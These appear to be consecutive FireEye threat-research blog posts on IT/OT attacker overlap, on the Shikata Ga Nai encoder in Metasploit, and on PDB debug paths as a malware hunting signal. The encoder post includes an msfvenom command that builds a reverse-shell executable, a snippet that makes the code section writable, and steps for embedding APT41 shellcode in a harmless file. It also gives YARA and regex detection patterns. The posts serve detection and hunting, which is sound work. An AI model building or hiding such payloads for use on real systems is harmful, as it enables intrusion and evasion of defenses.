Figure 3 presents a summary of TTP overlaps between TRITON, Industroyer, and some relatively common activity from the cybercrime group FIN6. FIN6 is a group of intrusion operators who have compromised multiple point-of-sale (POS) environments to steal payment card data and sell it on the dark web. While the motivations and ultimate goals of the threat actors that developed TRITON and Industroyer differ significantly from FIN6, the three actors share common TTPs, including the use of Meterpreter, compromising dual-homed systems, leveraging RDP to establish remote connections, and so forth. The overlap in tools and TTPs across actors interested in IT and OT should be of no surprise. The use of IT tools for OT compromises directly corresponds to a trend best known as IT/OT convergence. As IT equipment increasingly becomes integrated in OT systems and networks to improve efficiency and manageability, we can expect threat actors to be able to leverage networked computers as a conduit to reach industrial controls.

Drawing parallels between intrusions into high security environments, we can gain insight into actor behaviors and identify detection opportunities earlier in the attack lifecycle. Intelligence on intrusions across various sectors can be useful in highlighting which common and emerging adversary tools and TTPs are likely to be used in tailored attacks against organizations with OT assets.

FireEye Services, Intelligence, and Technology Provide Unparalleled Protection In IT and OT

While the FireEye approach to OT security detailed in this blog post emphasizes the criticality of “intermediary systems” when defending OT, we do not want to downplay the importance of the OT expertise and technology needed to respond to the most critical 1% of threat activity that does impact control systems. OT is in our DNA at FireEye: FireEye Mandiant’s OT practice has been one of the leading industry voices over the past six years, and the FireEye Cyber Physical Intelligence offering is the most recent evolution of the heritage of Critical Intelligence—the first commercial OT threat intelligence company founded in 2009.


Figure 4: FireEye OT-specific offerings

We believe that sharing our philosophy for OT security and highlighting FireEye’s comprehensive OT security capabilities will help organizations look at this security challenge from a different angle and take tangible steps forward to build a robust, all-encompassing security program. Figure 4 maps FireEye’s OT security offerings against the NIST Cybersecurity Framework’s Five Functions, matching FireEye services to the lifecycle of an organization’s cyber security risk management.

If you are interested in learning more or purchasing FireEye OT-focused solutions, you can reach out here: FireEye OT Solutions.

Shikata Ga Nai Encoder Still Going Strong

One of the most popular exploit frameworks in the world is Metasploit. Its vast library of pocket exploits, pluggable payload environment, and simplicity of execution make it the de facto base platform. Metasploit is used by pentesters, security enthusiasts, script kiddies, and even malicious actors. It is so prevalent that its user base even includes APT threat actors, as we will demonstrate later in the blog post.

Despite Metasploit’s more than 15-year existence, there are still core techniques that go undetected, allowing malicious actors to evade detection. One of these core techniques is the Shikata Ga Nai (SGN) payload encoding scheme. Modern detection systems have improved dramatically over the last several years and will often catch plain vanilla versions of known malicious methods. In many cases though, if a threat actor knows what they are doing, they can slightly modify existing code to bypass detection.

Before we jump into how SGN works, we’ll give a little background surrounding it. When threat actors plan to attack systems, they go through an assessment process of risk and reward. They cycle through questions of stealth and attribution. Some of these questions include: How much effort do I need to put into not getting caught? What happens if I get caught? How long can I reasonably evade detection? Will the discovery of my presence be attributed back to me? One way APT actors have attempted to elude detection in the first place is via encoding.

We know shellcode is primarily a set of instructions designed to manipulate execution of a program in ways not originally intended. The goal is to inject this shellcode into a vulnerable process. To manually create shellcode, one can pull the opcodes from machine code directly or pull them from an assembler/disassembler tool such as MASM (Microsoft Macro Assembler). Raw generated opcodes often will not execute out of the box. They often need to be touched up and made compatible with the processor they are executed on and the programming language they are being used for. An encoding scheme such as SGN takes care of these incompatibilities. Also, shellcode in a non-obfuscated state can be readily recognizable via static detection techniques. SGN provides obfuscation and, at first glance, randomness in the obfuscation of the shellcode.

Metasploit’s default configuration encodes all payloads. While Metasploit contains a variety of encoders, the most popular has been SGN. The phrase shikata ga nai in Japanese means “nothing can be done”. It was given this name because, at the time it was created, traditional anti-virus products had difficulty detecting it. As mentioned, some AV vendors now catch vanilla implementations, but miss slightly modified variants.

SGN is a polymorphic XOR additive feedback encoder. It is polymorphic in that each creation of encoded shellcode is different from the next. It accomplishes this through a variety of techniques such as dynamic instruction substitution, dynamic block ordering, randomly interchanging registers, randomizing instruction ordering, inserting junk code, using a random key, and randomizing the instruction spacing between other instructions. The XOR additive feedback piece refers to the fact that the algorithm XORs future instructions with a random key and then adds that instruction to the key, which is then used to encode the next instruction. Decoding the shellcode is a process of following the steps in reverse.
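To make the XOR additive feedback idea concrete, here is a deliberately simplified toy model in Python. It is not Metasploit’s actual SGN implementation (which also randomizes registers, instruction ordering, junk code and the decoder stub itself); it only shows how XORing each 4-byte block with a running key, then folding the block back into the key, chains every block to the ones before it.

import struct

def xor_additive_encode(data, key):
    # Pad to whole 4-byte blocks, XOR each block with the running key, then
    # fold the plaintext block back into the key (the "additive feedback").
    data = data.ljust((len(data) + 3) // 4 * 4, b"\x00")
    out = bytearray()
    for i in range(0, len(data), 4):
        plain = struct.unpack("<I", data[i:i + 4])[0]
        out += struct.pack("<I", plain ^ key)
        key = (key + plain) & 0xFFFFFFFF
    return bytes(out)

def xor_additive_decode(data, key):
    # Mirror image of the encoder: XOR first, then update the key the same way.
    out = bytearray()
    for i in range(0, len(data), 4):
        enc = struct.unpack("<I", data[i:i + 4])[0]
        plain = enc ^ key
        out += struct.pack("<I", plain)
        key = (key + plain) & 0xFFFFFFFF
    return bytes(out)

if __name__ == "__main__":
    payload = b"\x90\x90\x90\x90\xcc\xcc\xcc\xcc"  # placeholder bytes, not real shellcode
    key = 0xDEADBEEF
    assert xor_additive_decode(xor_additive_encode(payload, key), key) == payload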

Creating an SGN Encoded Payload

The following steps can be recreated with Metasploit and your choice of debugging/disassembly tools:

  1. First create a plain vanilla SGN encoded payload:
    msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.169.0.36 LPORT=80 -b "\x00" -e x86/shikata_ga_nai -f exe -o /root/Desktop/metasploit/IamNotBad.exe
  2. Open the file in a disassembler. Upon looking at the binary in a disassembler, you first notice a great deal of junk instructions (Figure 1). Also, Metasploit by default does not set the memory location of the code (.text section in this case) as writable. This will need to be set, otherwise the shellcode will not run.


Figure 1: Junk instructions when viewing the binary in a disassembler


Figure 2: RWX Flag = E0000020


Figure 3: Skip the junk code and go directly to the algorithm, which can be done by inserting a jump instruction
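If you would rather make the section-flag change from step 2 programmatically than in a hex editor, a small pefile sketch can do it. The filenames here are hypothetical, and E0000020 is the read/write/execute/code characteristics value shown in Figure 2.

import pefile

# IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
RWX_CODE = 0xE0000020

pe = pefile.PE("IamNotBad.exe")
for section in pe.sections:
    if section.Name.rstrip(b"\x00") == b".text":
        # Mark the section writable so the SGN decoder stub can rewrite itself.
        section.Characteristics |= RWX_CODE
pe.write("IamNotBad_rwx.exe")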

Algorithm Breakdown

The algorithm consists of:

  1. Initialization key specification.
  2. Retrieve a location relative to EIP (so that we can modify instructions moving forward based on the address obtained)
    • Metasploit commonly uses the fstenv/fnstenv instructions to put it on the stack where it can be popped into a register for use. There are other ways to get EIP if wanted.
  3. Go through a loop to decode other instructions (by default, encoded instructions will all reside in the .text section)
    • Vanilla SGN zeroes out the register to be used as the counter and explicitly moves the counter value into the register, so the loop portion is obvious. The loop instruction is encoded, so you won’t see it until decoding has gone far enough.
    • SGN decodes instructions at a higher memory address (it could use lower addresses if it wanted to for more trickery). This is done by adding a value to the stored address from before (the one relative to EIP) and XORing it with the key. In the example that follows you see the instruction XOR [eax+18h], esi at .text:00408B98.
    • The address from earlier (the one relative to EIP) is then modified and the key may also be modified [Metasploit by default usually adds or subtracts an instruction value somewhere relative to the address stored from before (the one relative to EIP)].
    • The loop continues until all instructions are decoded and then it moves execution to the decoded shellcode, in this case the reverse shell.
  4. As a side note, Shikata Ga Nai allows for multiple iterations. If multiple iterations are chosen, steps 1 to 3 are repeated after the completion of the current iteration.

As you can see from each of the aforementioned steps, if you are a defender relying solely on static detection, detection can be quite difficult. With something encoded like this, it is difficult to statically identify the specific malicious behavior without unrolling the encoded instructions. Constantly scanning memory is computationally expensive, making it less feasible. This leaves most detection platforms relying on behavioral indicators or sandboxes.


Figure 4: Code before decoding


Figure 5: Instructions being decoded

For many of those that have been in cyber security for a while, this is not new. What is still relevant though is the fact that many malicious payloads encoded with SGN are still making it past defenses and still being used by threat actors. We noticed SGN encoded payloads still making it onto systems and we decided to investigate further. The results were both rewarding and surprising and led to additional detection methods discussed in the “Detection” section. It also gave us more awareness as to the extent SGN was still being used. The following is an example of a payload we recovered from an APT actor.

Embedding a Payload

For this example, we used an existing APT41 sample and embedded the payload into a benign PE. This APT41 sample is shellcode that is Shikata Ga Nai encoded.

MD5: def46c736a825c357918473e3c02b3ef

We will take a benign PE we created (ImNotBad.exe) and embed the APT41 sample to show SGN in action. We create a new section called NewSec and set the section values appropriately.


Figure 6: Calculate the size of the shellcode: start address 12000, end address 94C10, for a difference of 82C10. Make sure the size falls within the data that is present.


Figure 7: Insert the shell code into the benign PE (ImNotBad.exe)


Figure 8: The embedded shellcode can be found in the code


Figure 9: Patch the code to jump to it


Figure 10: Here are the four steps from the Shikata Ga Nai algorithm (mentioned previously) demonstrated

In Figure 11 and Figure 12, as the first set of instructions is decoded, the sample appears to attempt to avoid normal execution. EA 25 D9 74 24 F4 BB: note how the EA and 25 bytes are inserted to cause the code to crash (jumping to a curious spot in the code). We did not investigate the crash further, but when the code is patched with NOPs, it executes the next decode sequence.


Figure 11: As the first set of instructions is decoded, the sample appears to attempt to avoid normal execution


Figure 12: As the first set of instructions is decoded, the sample appears to attempt to avoid normal execution

Detection

Detecting SGN encoded payloads can be difficult as a defender, especially if static detection is heavily relied upon. Decoding and unraveling the encoded instructions is necessary to identify the intended malicious purpose. Constantly scanning memory is computationally expensive, making it less feasible. This leaves most detection platforms relying on detection via behavioral indicators and sandboxes. FireEye appliances contain both static and dynamic detection components. Detection is achieved by a variety of engines, including FireEye's machine learning engine, MalwareGuard. The numerous engines within FireEye appliances serve specific purposes and have different strengths and weaknesses. Creating detection around these various engines allows FireEye to utilize each of their strengths, and correlating activity between the engines allows for unique detection opportunities and production detections that would otherwise not be possible when relying on a single engine. We were able to create production detections correlating the different engines on the FireEye appliances to detect SGN encoded binaries with high fidelity. The current production detections take advantage of the static, dynamic and machine learning engines within the FireEye appliance.

As an example of the complications concerned with detecting SGN, we will construct code encoded with a slightly modified version of Metasploit’s plain SGN algorithm (Figure 13): 


Figure 13: Example code for possible static detection

One of the keys to writing a good static detection rule is recognizing the unique malicious behaviors of what you are trying to detect. The next is capturing as much of that behavior as possible without causing false positives (FPs). Earlier in the post we listed the core behaviors of the SGN algorithm. For the sake of illustration, let’s try to match on some of those behaviors. We’ll attempt to match on the key, the mechanism used to get EIP, and the XOR additive feedback loop.

If we were trying to detect the code in Figure 13 statically, we could use the open source tool Yara. As a first pass we could construct the following rule (Figure 14):


Figure 14: Example SGN YARA static detection rule for the code in Figure 13

In the rule in Figure 14 we have added padding bytes to try to thwart an attacker who would insert junk instructions. If an adversary realized what we were matching on, it could be easily defeated by inserting junk code beyond our padding. We could play the game of cat and mouse and continue to increase our padding based on what we saw, but this is not a good solution; as we pad out more bytes, the rule also becomes more FP prone. Besides adding junk code, other obvious evasion techniques an attacker could use include using different registers, performing arithmetic operations to obtain values, or reordering instructions. Metasploit does a decent job randomizing the algorithm with these things, which makes static detection more difficult. Trying to catch each modified version could be never-ending.

Static detection is a useful technique, but very limited. If this is all you rely on, you will miss much of the malicious behavior getting onto your systems. For SGN, we studied it further and identified the core behavioral pieces. We saw how it was still being used by modern malware. The following is an example hunting rule that can be used to detect some of the current common permutations created by vanilla x86-SGN in Metasploit. This rule can be further expanded upon to include additional logic if desired.

rule Hunting_Rule_ShikataGaNai
{
    meta:
        author = "Steven Miller"
    strings:
        $varInitializeAndXorCondition1_XorEAX = { B8 ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 59 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 40 | 41 | 42 | 43 | 45 | 46 | 47 ) ?? }
        $varInitializeAndXorCondition1_XorEBP = { BD ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5B | 5C | 5E | 5F ) [0-50] 31 ( 68 | 69 | 6A | 6B | 6D | 6E | 6F ) ?? }
        $varInitializeAndXorCondition1_XorEBX = { BB ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5C | 5D | 5E | 5F ) [0-50] 31 ( 58 | 59 | 5A | 5B | 5D | 5E | 5F ) ?? }
        $varInitializeAndXorCondition1_XorECX = { B9 ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 48 | 49 | 4A | 4B | 4D | 4E | 4F ) ?? }
        $varInitializeAndXorCondition1_XorEDI = { BF ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5B | 5C | 5D | 5E ) [0-50] 31 ( 78 | 79 | 7A | 7B | 7D | 7E | 7F ) ?? }
        $varInitializeAndXorCondition1_XorEDX = { BA ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 50 | 51 | 52 | 53 | 55 | 56 | 57 ) ?? }
        $varInitializeAndXorCondition2_XorEAX = { D9 74 24 F4 [0-30] B8 ?? ?? ?? ?? [0-10] ( 59 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 40 | 41 | 42 | 43 | 45 | 46 | 47 ) ?? }
        $varInitializeAndXorCondition2_XorEBP = { D9 74 24 F4 [0-30] BD ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5B | 5C | 5E | 5F ) [0-50] 31 ( 68 | 69 | 6A | 6B | 6D | 6E | 6F ) ?? }
        $varInitializeAndXorCondition2_XorEBX = { D9 74 24 F4 [0-30] BB ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5C | 5D | 5E | 5F ) [0-50] 31 ( 58 | 59 | 5A | 5B | 5D | 5E | 5F ) ?? }
        $varInitializeAndXorCondition2_XorECX = { D9 74 24 F4 [0-30] B9 ?? ?? ?? ?? [0-10] ( 58 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 48 | 49 | 4A | 4B | 4D | 4E | 4F ) ?? }
        $varInitializeAndXorCondition2_XorEDI = { D9 74 24 F4 [0-30] BF ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5B | 5C | 5D | 5E ) [0-50] 31 ( 78 | 79 | 7A | 7B | 7D | 7E | 7F ) ?? }
        $varInitializeAndXorCondition2_XorEDX = { D9 74 24 F4 [0-30] BA ?? ?? ?? ?? [0-10] ( 58 | 59 | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 50 | 51 | 52 | 53 | 55 | 56 | 57 ) ?? }
    condition:
        any of them
}

Thoughts

Metasploit is used by many different people for many different reasons. Some may use Metasploit for legitimate purposes such as red team engagements, research or educational tasks, while others may use the framework with malicious intent. In the latter category, FireEye has historically observed APT20, a suspected Chinese nation-state sponsored threat group, utilize Metasploit with SGN encoded payloads. APT20 is one of the many named threat groups that FireEye tracks. This group has a primary focus on stealing data, specifically intellectual property.

Other named groups include APT41 and FIN6. APT41 was formally disclosed by FireEye Intelligence earlier this year. This group has utilized SGN encoded payloads within custom developed backdoors. APT41 is a Chinese cyber threat group that has been observed carrying out financially motivated missions coinciding with cyber-espionage operations. Financial threat group FIN6 has also used SGN encoded payloads to carry out their missions, and they have historically relied upon various publicly available tools. These missions largely involve theft of payment card data from point-of-sale systems.

FireEye has also observed numerous uncategorized threat groups utilizing payloads encoded with SGN. These are groups that FireEye tracks internally but has not announced formally. One of these groups in particular is UNC902, which is largely known as the financially motivated group TA505 in public threat reports. FireEye has observed UNC902 extensively use SGN encoding within their payloads and we continue to see activity related to this group, even as recently as October 2019.

Outside of these groups, we continue to observe usage of SGN encoding within malicious samples. FireEye currently identifies hundreds of SGN encoded payloads on a monthly basis. SGN encoded payloads are not always used with the same intent, but this is one side effect of being embedded into such a popular and freely available framework. Looking forward, we expect to see continued usage of SGN encoded payloads.

Definitive Dossier of Devilish Debug Details – Part One: PDB Paths and Malware

Have you ever wondered what goes through the mind of a malware author? How they build their tools? How they organize their development projects? What kind of computers and software they use? We took a stab at answering some of those questions by exploring malware debug information.

We find that malware developers give descriptive names to their folders and code projects, often describing the capabilities of the malware in development. These descriptive names thus show up in a PDB path when a malware project is compiled with symbol debugging information. Everyone loves an origin story, and debugging information gives us insight into the malware development environment, a small, but important keyhole into where and how a piece of malware was born. We can use our newfound insight to detect malicious activity based in part on PDB paths and other debug details.

Welcome to part one of a multi-part, tweet-inspired series about PDB paths, their relation to malware, and how they may be useful in both defensive and offensive operations.

Human-Computer Conventions

Digital storage systems have revolutionized our world, but in order to make use of our stored data and retrieve it in an efficient manner, we must organize it sensibly. Users structure directories carefully and give files and folders unique and descriptive names. Often users name folders and files based on their content. Computers force users to label and annotate their data based on the data type, role, and purpose. This human-computer convention means that most digital content has some descriptive surface area, or descriptive “features”, that are present in many files, including malware files.

FireEye approaches detection and hunting from many angles, but on FireEye’s Advanced Practices team, we often like to flex on “weak signals.” We like to search for features of malware that are not evil in isolation but uncommon or unique enough to be useful. We create conditional rules that when met are “weak signals” telling us that a subset of data, such as a file object or a process, has some odd or novel features. These features are often incidental outcomes of adversary methods, or modus operandi, that each represent deliberate choices made by malware developers or intrusion operators. Not all these features were meant to be in there, and they were certainly not intended for defenders to notice. This is especially true for PDB paths, which can be described as an outcome of the compilation process, a toolmark left in malware that describes the development environment.

PDBs

A program database (PDB) file, often referred to as a “symbol file,” is generated upon compilation to store debugging information about an individual build of a program. A PDB may store symbols, addresses, names of functions and resources and other information that may assist with debugging the program to find the exact source of an exception or error.

Malware is software, and malware developers are software developers. Like any software developers, malware authors often have to debug their code and sometimes end up creating PDBs as part of their development process. If they do not spend time debugging their malware, they risk their malware not functioning correctly on victim hosts, or not being able to successfully communicate with their malware remotely.

How PDB Paths are Made (the birds and the PDBs?)

But how are PDBs created and connected to programs? Let’s examine the formation of one PDB path through the eyes of a malware developer and blogger, the soon-to-be-infamous “smiller.”

Smiller has a lot of programming projects and organizes them in an aptly labeled folder structure on his computer. This project is for a shellcode loader embedded in an HTML Application (HTA) file, and the developer stores it quite logically in the folder:

D:\smiller\projects\super_evil_stuff\shellcode\


Figure 1: The simple “Test” project code file “Program.cs” which embeds a piece of shellcode and a launcher executable within an HTML Application (HTA) file


Figure 2: The malicious Visual Studio solution HtaDotnet and corresponding “Test” project folder as seen through Windows Explorer. The names of the folders and files are suggestive of their functionalities

The malware author then compiles their “Test” project in Visual Studio using the default “Debug” configuration (Figure 3) and writes out Test.exe and Test.pdb to a subfolder (Figure 4).


Figure 3: The Visual Studio output of a default compiling configuration


Figure 4: Test.exe and Test.pdb are written to a default subfolder of the code project folder

In the Test.pdb file (Figure 5) there are references to the original path for the source code files along with other binary information for use in debugging.


Figure 5: Test.pdb contains binary debug information and references to the original source code files for use in debugging

During the compilation, the linker program associates the PDB file with the built executable by adding an entry into the IMAGE_DEBUG_DIRECTORY specifying the type of the debug information. In this case, the debug type is CodeView, and so the PDB path is embedded under the IMAGE_DEBUG_TYPE_CODEVIEW portion of the file. This enables a debugger to locate the correct PDB file, Test.pdb, while debugging Test.exe.


Figure 6: Test.exe as shown in the PEview utility, which easily parses out the PDB path from the IMAGE_DEBUG_TYPE_CODEVIEW section of the executable file

PDB Path in CodeView Debug Information

CodeView Structure

The exact format of the debug information may vary depending on compiler and linker and the modernity of one’s software development tools. CodeView debug information is stored under IMAGE_DEBUG_TYPE_CODEVIEW in the following structure:

Type     Description
DWORD    "RSDS" header
GUID     16-byte Globally Unique Identifier
DWORD    "age" (incrementing # of revisions)
BYTE     PDB path, null terminated

Figure 7: Structure of CodeView debug directory information

Full Versus Partial PDB Path

There are generally two buckets of CodeView PDB paths: those that are fully qualified directory paths and those that are partially qualified, specifying the name of the PDB file only. In both cases, the name of the PDB file with the .pdb extension is included to ensure the debugger locates the correct PDB for the program.

A partially qualified PDB path would list only the PDB file name, such as:

Test.pdb

A fully qualified PDB path usually begins with a volume drive letter and a directory path to the PDB file name such as:

D:\smiller\projects\super_evil_stuff\shellcode\Test\obj\Debug\Test.pdb

Typically, native Windows executables use a partially qualified PDB path because many of the debug PDB files are publicly available on the Microsoft public symbol server, making a fully qualified path unnecessary. For the purposes of this research, we will be looking mostly at fully qualified PDB paths.

Surveying PDB Paths in Malware

In Operation Shadowhammer, which has a myriad of connections to APT41, one sample had a simple, yet descriptive PDB path: “D:\C++\AsusShellCode\Release\AsusShellCode.pdb”

The naming makes perfect sense. The malware was intended to masquerade as Asus Corporation software, and the role of the malware was shellcode. The malware developer named the project after the function and role of the malware itself.

If we accept that the nature of software development forces developers into these naming conventions, then we would expect these conventions to hold true across other threat actors, malware families, and intrusion operations. FireEye’s Advanced Practices team loves to take seemingly innocuous features of an intrusion set and determine what about them is good, bad and ugly. What is normal, and what is abnormal? What is globally prevalent and what is rare? What are malware authors doing that is different from what non-malware developers are doing? What assumptions can we make and measure?

Letting our curiosity take the wheel, we adapted the CodeView debug information structure into a regular expression (Figure 8) and developed Yara rules (Figure 9) to survey our data sets. This helped us identify commonalities and enabled us to see which threat actors and malware families may be “detectable” based only on features within PDB path strings.


Figure 8: A Perl-compatible regular expression (PCRE) adaptation of the PDB7 debug information in an executable to include a specific keyword


Figure 9: Template Yara rule to search for executables with PDB files matching a keyword
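As a rough illustration of the same approach in script form, here is a minimal Python sketch (our own, not FireEye tooling): a bytes regex patterned on the ConventionEngine PCRE that appears later in this post, with an arbitrary placeholder keyword, applied to any files passed on the command line.

import re
import sys

# Patterned on the ConventionEngine PCRE used later in this post: the "RSDS" header,
# 20 bytes of GUID and age, a drive letter, then a path ending in ".pdb" plus a null.
# The keyword is an illustrative placeholder; swap in any term from the tables below.
KEYWORD = rb"shellcode"
PDB7_KEYWORD = re.compile(
    rb"RSDS[\x00-\xff]{20}[a-zA-Z]:\\[\x00-\xff]{0,200}" + KEYWORD + rb"[\x00-\xff]{0,200}\.pdb\x00",
    re.IGNORECASE,
)

def has_keyword_pdb_path(path):
    with open(path, "rb") as f:
        return PDB7_KEYWORD.search(f.read()) is not None

if __name__ == "__main__":
    for sample in sys.argv[1:]:
        if has_keyword_pdb_path(sample):
            print("PDB path keyword hit:", sample)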

PDB Path Showcase: Malware Naming Conventions

We surveyed 10+ million samples in our incident response and malware corpus, and we found plenty of common PDB path keywords that seemed to transcend different sources, victims, affected regions, impacted industries, and actor motivations. To help articulate the broad reach of malware developer commonalities, we detail a handful of the stronger keywords along with example PDB paths and the malware families and threat groups for which at least one sample contains the applicable keyword.

Please note that the example paths and represented malware families and groups are a selection from the total data set, and not necessarily correlated, clustered or otherwise related to each other. This is intended to illustrate the wide presence of PDB paths with keywords and how malware developers, irrespective of origin, targets and motivations, often end up using some of the same words in their naming. We believe that this commonality increases the surface area of malware and introduces new opportunities for detection and hunting.

PDB Path Keyword Prevalence

Keyword

Families and Groups Observed

Example PDB Path

anti

RUNBACK, HANDSTAMP, LOKIBOT, NETWIRE, DARKMOON, PHOTO, RAWHIDE, DUCKFAT, HIGHNOON, DEEPOCEAN, SOGU, CANNONFODDER
APT10, APT24, APT41, UNC589, UNC824, UNC969, UNC765

H:\RbDoor\Anti_winmm\AppInit\AppInit\Release\AppInit.pdb

attack

MINIASP, SANNY, DIRTCHEAP, ORCUSRAT
APT1, UNC776, UNC251, UNC1131

E:\C\Attack\mini_asp-0615\attack\MiniAsp3\Release\MiniAsp.pdb

backdoor

PACMAN, SOUNDWAVE, PHOTO, WINERACK, DUALGUN

APT41, APT34, APT37, UNC52, UNC1131, APT40

Y:\Hack\backdoor\3-exe-attack\temp\UAC_Elevated\win32\UAC_Elevated.pdb

bind

SCREENBIND, SEEGAP, CABLECAR, UPDATESEE, SEEDOOR, TURNEDUP, CABROCK, YABROD, FOXHOLE

UNC373, UNC510, UNC875, APT36, APT33, APT5, UNC822

C:\Documents and Settings\ss\桌面\tls\scr\bind\bind\Release\bind.pdb

bypass

POSHC2, FIRESHADOW, FLOWERPOT, RYUK, HAYMAKER, UPCONTROL, PHOTO, BEACON, SOGU

APT10, APT34, APT21, UNC1289, UNC1450

C:\Documents and Settings\Administrator\桌面\BypassUAC.VS2010\Release\Go.pdb

downloader

SPICYBEAN, GOOSEDOWN, ANTFARM, BUGJUICE, ENFAL, SOURFACE, KASPER, ELMER, TWOBALL, KIBBLEBITS

APT28, UNC1354, UNC1077, UNC27, UNC653, UNC1180, UNC1031

Z:\projects\vs 2012\Inst DWN and DWN XP\downloader_dll_http_mtfs\Release\downloader_dll_http_mtfs.pdb

dropper

CITADEL, FIDDLELOG, SWIFTKICK, KAYSLICE, FORMBOOK, EMOTET, SANNY, FIDDLEWOOD, DARKNEURON, URSNIF, RUNOFF

UNC776, UNC1095, APT29, APT36, UNC964, UNC1437, UNC849

D:\Task\DDE Attack\Dropper_Original\Release\Dropper.pdb

exploit

TRICKBOT, RUNBACK, PUNCHOUT, QANAT, OZONERAT

UNC1030, APT39, APT34, FIN6

w:\modules\exploits\littletools\agent_wrapper\release\
12345678901234567890123456789012345678\wrapper3.pdb

fake

FIRESHADOW

UNC1172, APT39, UNC822

D:\Work\Project\VS\house\Apple\Apple_20180115\Release\FakeRun.pdb

fuck

TRICKBOT, CEREAL, KRYPTONITE, SUPERMAN

APT17, UNC208, UNC276

E:\CODE\工程文件\20110505_LEVNOhard\CODE\AnyRat\FuckAll'sUI\bin\FuckAll.pdb

hack

PHOTO, KILLDEVIL, NETWIRE, PACMAN, BADSIGN, TRESOCHO, BADGUEST, GH0ST, VIPSHELL

UNC1152, APT40, UNC78, UNC874, UNC52, UNC502, APT33, APT8

C:\Users\Alienware.DESKTOP-MKL3QDN\Documents\Hacker\memorygrabber - ID\memorygrabber\obj\x86\Debug\vshost.pdb

hide

FRESHAIR, DIRTYWORD, GH0ST, DARKMOON, FIELDGOAL, RAWHIDE, DLLDOOR, TRICKBOT, 008S, JAMBOX, SOGU, CANDYSHELL

APT26, APT40, UNC213, APT26, UNC44, UNC53, UNC282

c:\winddk\6001.18002\work\hideport\i386\HidePort.pdb

hook

GEARSHIFT, METASTAGE, FASTPOS, HANDSTAMP, FON, CLASSFON, WATERFAIRY, RATVERMIN

UNC842, UNC1197, UNC1040, UNC969

D:\รายงาน\C++ & D3D & Hook & VB.NET & PROJECT\Visual Studio 2010\CodeMaster OnlyTh\Inject_Win32_2\Inject Win32\Inject Win32\Release\OLT_PBFREE.pdb

inject

SKNET, KOADIC, ISMAGENT, FULLTRUNK, ZZINJECT, ENFAL, RANSACK, GEARSHIFT, LOCKLOAD, WHIPSNAP, BEACON, CABROCK, HIGHNOON, DETECT, THREESNEAK, FOXHOLE

UNC606, APT10, APT34, APT41, UNC373, APT31, APT34, APT19, APT1, UNC82, UNC1168, UNC1149, UNC575

E:\0xFFDebug\My Source\HashDump\Release\injectLsa.pdb

install

FIRESHADOW, SCRAPMINT, BRIGHTCOMB, WINERACK, SLUDGENUDGE, ANCHOR, EXCHAIN, KIBBLEBITS, ENFAL, DANCEPARTY, SLIMEGRIME, DRABCUBE, EXCHAIN, DIMWIT, THREESNEAK, GOOGONE, STEW, LOWLIGHT, QUASIFOUR, CANNONFODDER, EASYCHAIR, ONETOFOUR, DEEPOCEAN, BRIGHTCREST, LUMBERJACK, EVILTOSS, BRIGHTCYAN, PEKINGDUCK, SIDEVIEW, BOSSNAIL

UNC869, UNC385, UNC228, APT5, UNC229, APT26, APT37, UNC432, APT18, UNC27, APT6, UNC1172, UNC593, UNC451, UNC875, UNC53

i:\LIE_SHOU\URL_CURUN-A\installer\Release\jet.pdb

keylog

LIMITLESS, ZZDROP, WAVEKEY, FIDDLEKEYS, SKIDHOOK, HAWKEYE, BEACON, DIZZYLOG, SOUNDWAVE

APT37, UNC82, UNC1095, APT1, APT40

D:\TASK\ProgamsByMe(2015.1~)\MyWork\Relative Backdoor\KeyLogger_ScreenCap_Manager\Release\SoundRec.pdb

payload

POSHC2, SHAKTI, LIMITLESS, RANSACK, CATRUNNER, BREAKDANCE, DARKMOON, METERPRETER, DHARMA, GAMEFISH, RAWHIDE, LIGHTPOKE

UNC915, UNC632, UNC1149, APT28, UNC878

C:\Users\WIN-2-ViHKwdGJ574H\Desktop\NSA\Payloads\windows service cpp\Release\CppWindowsService.pdb

shell

SOGU, RANSACK, CARBANAK, BLACKCOFFEE, SIDEWINDER, PHOTO, SHIMSHINE, PILLOWMINT, POSHC2, PI, METASTAGE, GH0ST, VIPSHELL, GAUSS, DRABCUBE, FINDLOCK, NEDDYSHELL, MONOPOD, FIREPIPE, URSNIF, KAYSLICE, DEEPOCEAN, EIGHTONE, DAYJOB, EXCALIBUR, NICECATCH

UNC48, UNC1225, APT17, UNC1149, APT35, UNC251, UNC521, UNC8, UNC849, UNC1428, UNC1374, UNC53, UNC1215, UNC964, UNC1217, APT3, UNC671, UNC757, UNC753, APT10, APT34, UNC229, APT18, APT9, UNC124, UNC1559

E:\windows\dropperNew\Debug\testShellcode.pdb

sleep

URSNIF, CARBANAK, PILLOWMINT, SHIMSHINE, ICEDID

FIN7

O:\misc_src\release_priv_aut_v2.2_sleep_DATE\my\
src\sdb_test_dll\x64\Release\sdb_test.pdb

spy

DUSTYSKY, OFFTRACK, SCRAPMINT, FINSPY, LOCKLOAD, WINDOLLAR

FIN7, UNC583, UNC822, UNC1120

G:\development\Winspy\ntsvc32-93-01-05\x64\Release\ntsvcst32.pdb

trojan

ENFAL, IMMINENTMONITOR, MSRIP, GH0ST, LITRECOLA, DIMWIT

UNC1373, UNC366, APT19, UNC1352, UNC27, APT1, UNC981, UNC581, UNC1559

e:\work\projects\trojan\client\dll\i386\Client.pdb

Figure 10: A selection of common keywords in PDB paths with groups and malware families observed and examples

PDB Path Showcase: Suspicious Developer Environment Terms

